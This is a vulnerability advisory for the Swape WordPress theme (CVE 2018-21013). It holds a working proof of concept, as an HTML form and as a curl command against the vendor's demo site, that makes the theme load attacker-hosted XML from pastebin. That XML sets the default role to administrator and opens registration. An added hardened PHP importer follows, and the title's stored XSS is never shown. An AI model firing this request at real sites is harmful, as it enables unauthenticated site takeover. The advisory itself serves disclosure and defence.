Swape Theme - Authentication Bypass and Stored XSS

Description
Similar to https://wpvulndb.com/vulnerabilities/8061, but requiring no authentication.

The theme suffers from a privilege escalation vulnerability: because of weak permission checks, any user can trigger it.

An attacker can update options, such as the default role for new users and the registration state, which may lead to executing commands/code on the server and taking over the website.

Proof of Concept

<form action="http://my-example-site.test/wp-admin/admin-ajax.php" method="post" >
    <input name="action" value="call_upper_load_settings" type="text" />
    <input name="xmlPath" value="https://pastebin.com/raw/VCadYnh7" type="text" />
    <input type="submit" >
</form>

or

curl --request POST \
    --url https://upperinc.com/previews/wp/swape/demo1/wp-admin/admin-ajax.php \
    --form action=call_upper_load_settings \
    --form xmlPath=https://pastebin.com/raw/VCadYnh7


and the pastebin content is:

<?xml version="1.0"?>
<root>
  <option>
    <id>default_role</id>
    <value>administrator</value>
  </option>
  <option>
    <id>users_can_register</id>
    <value>1</value>
  </option>
</root>
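The root cause described above is an admin-ajax handler that writes options from a caller-supplied XML location without checking who is calling. The following is an added example of how such an importer can be written defensively; it is not the Swape theme's own code, and the function name `example_load_settings`, the option allowlist and the `demo-data` directory are hypothetical. Only the action name `call_upper_load_settings` comes from the advisory.

```php
<?php
// Added example, not the theme's code: a hardened admin-ajax settings
// importer. Names other than the action name are hypothetical.

// Register only the authenticated hook. Registering wp_ajax_nopriv_* as
// well would expose the handler to logged-out visitors.
add_action( 'wp_ajax_call_upper_load_settings', 'example_load_settings' );

// Options this importer is allowed to write. Core options such as
// default_role or users_can_register are deliberately absent.
const EXAMPLE_IMPORTABLE_OPTIONS = array( 'example_theme_layout', 'example_theme_color' );

function example_load_settings() {
    // 1. Authorization: only users who may manage options at all.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient permissions', 403 );
    }
    // 2. CSRF: the request must carry a nonce issued for this action.
    check_ajax_referer( 'example_load_settings', 'nonce' );

    // 3. Never fetch a caller-supplied URL. Accept a bare file name only and
    //    resolve it inside the theme's own demo directory; realpath() defeats
    //    path traversal and symlink tricks.
    $base = realpath( get_template_directory() . '/demo-data' );
    $name = basename( sanitize_file_name( wp_unslash( $_POST['xmlPath'] ?? '' ) ) );
    $path = realpath( $base . '/' . $name );
    if ( false === $path || 0 !== strpos( $path, $base . DIRECTORY_SEPARATOR ) || '.xml' !== substr( $path, -4 ) ) {
        wp_send_json_error( 'unknown settings file', 400 );
    }

    // 4. Parse without network access for external entities.
    $xml = simplexml_load_string( file_get_contents( $path ), 'SimpleXMLElement', LIBXML_NONET );
    if ( false === $xml ) {
        wp_send_json_error( 'malformed settings file', 400 );
    }

    // 5. Allowlist every option id before writing it.
    $applied = array();
    foreach ( $xml->option as $opt ) {
        $id = sanitize_key( (string) $opt->id );
        if ( ! in_array( $id, EXAMPLE_IMPORTABLE_OPTIONS, true ) ) {
            continue; // skip anything not explicitly permitted
        }
        update_option( $id, sanitize_text_field( (string) $opt->value ) );
        $applied[] = $id;
    }
    wp_send_json_success( array( 'applied' => $applied ) );
}
```

The admin page that triggers the import must include the matching nonce, created with `wp_create_nonce( 'example_load_settings' )`, as the `nonce` form field; with these checks the request shown in the proof of concept is rejected before any option is written.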

Affects Theme

Fixed in version 1.2.1

References

CVE 2018-21013
URL https://themeforest.net/item/swape-app-showcase-app-store-wordpress-theme/20376082
URL https://upperthemes.com/product/swape-app-showcase-app-store-wordpress-theme/

Classification

Type BYPASS

Miscellaneous

Submitter Aaron
Submitter Twitter BernsteinA
Views 10012
Verified No
WPVDB ID 9024

Timeline

Publicly Published 2018-02-08
Added 2018-02-09
Last Updated 2019-11-01
